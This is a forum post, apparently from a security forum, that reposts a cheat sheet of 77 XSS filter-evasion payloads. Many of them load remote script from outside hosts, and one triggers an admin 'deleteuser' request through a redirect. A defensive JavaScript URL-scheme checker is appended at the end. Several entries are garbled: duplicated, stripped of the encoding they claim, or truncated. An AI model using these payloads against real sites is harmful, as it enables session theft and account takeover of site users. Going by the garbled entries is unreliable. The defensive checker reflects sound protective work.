It seems t00ls has fairly little material on XSS, so I copied over something good I came across; not sure whether any of you will want to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically useless domestically, because there is nowhere to use them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the script in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach (only the tail of the payload survived on this page)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot (absolute DNS)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
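As an added example (not code from the original post), the JavaScript below shows the defender's side of entries (3) to (19), (40) and (47): a scheme check that decodes numeric character references, strips the whitespace and control characters those entries rely on, and only then compares the scheme. The sample inputs are constructed and the function names are my own.

```javascript
// Added example, not part of the original post: normalise an attribute
// value the way a lenient browser would, then look at the scheme.
// Decode numeric character references. The semicolon is optional, as in
// entries (9) and (10); named references are not handled here.
function decodeCharRefs(value) {
  return value.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (ref, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? ref : String.fromCodePoint(cp);
  });
}

// Drop characters a browser may ignore inside a URL: C0 controls (NUL,
// tab, LF, CR), space, DEL, NBSP and the Unicode spaces from entry (47).
function stripIgnorable(value) {
  return value.replace(/[\u0000-\u0020\u007f\u00a0\u2000-\u200b\u3000\ufeff]/g, '');
}

// Normalised scheme of the value ('javascript', 'http', ...) or null.
function extractScheme(value) {
  const norm = stripIgnorable(decodeCharRefs(value)).toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(norm);
  return m ? m[1] : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);

// True when the value would run script if used as SRC, HREF or url().
function isScriptUrl(value) {
  const scheme = extractScheme(value);
  return scheme !== null && SCRIPT_SCHEMES.has(scheme);
}

// Constructed inputs mirroring the numbered entries above.
const SCRIPT_SAMPLES = [
  "javascript:alert('XSS')", "JaVaScRiPt:alert('XSS')",                   // (3) (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (5)
  "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",         // (9)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61lert('XSS')", // (10)
  "jav\tascript:alert('XSS')", "jav&#x09;ascript:alert('XSS')",             // (11) (12)
  "jav\nascript:alert('XSS')", "jav\rascript:alert('XSS')",                 // (13) (14)
  "java\u0000script:alert('XSS')", " javascript:alert('XSS')",              // (17) (19)
  "vbscript:msgbox(\"XSS\")",                                               // (40)
];
const BENIGN_SAMPLES = ['http://example.com/a.css', '//example.com/', '/img/a.jpg', 'mailto:x@example.com'];

// True when every script sample is flagged and no benign sample is.
function selfCheck() {
  return SCRIPT_SAMPLES.every(isScriptUrl) && !BENIGN_SAMPLES.some(isScriptUrl);
}
```

The check is deliberately stricter than any single browser: a legitimate scheme never contains whitespace or control characters, so stripping them costs nothing and closes the gap a naive "javascript:" substring match leaves.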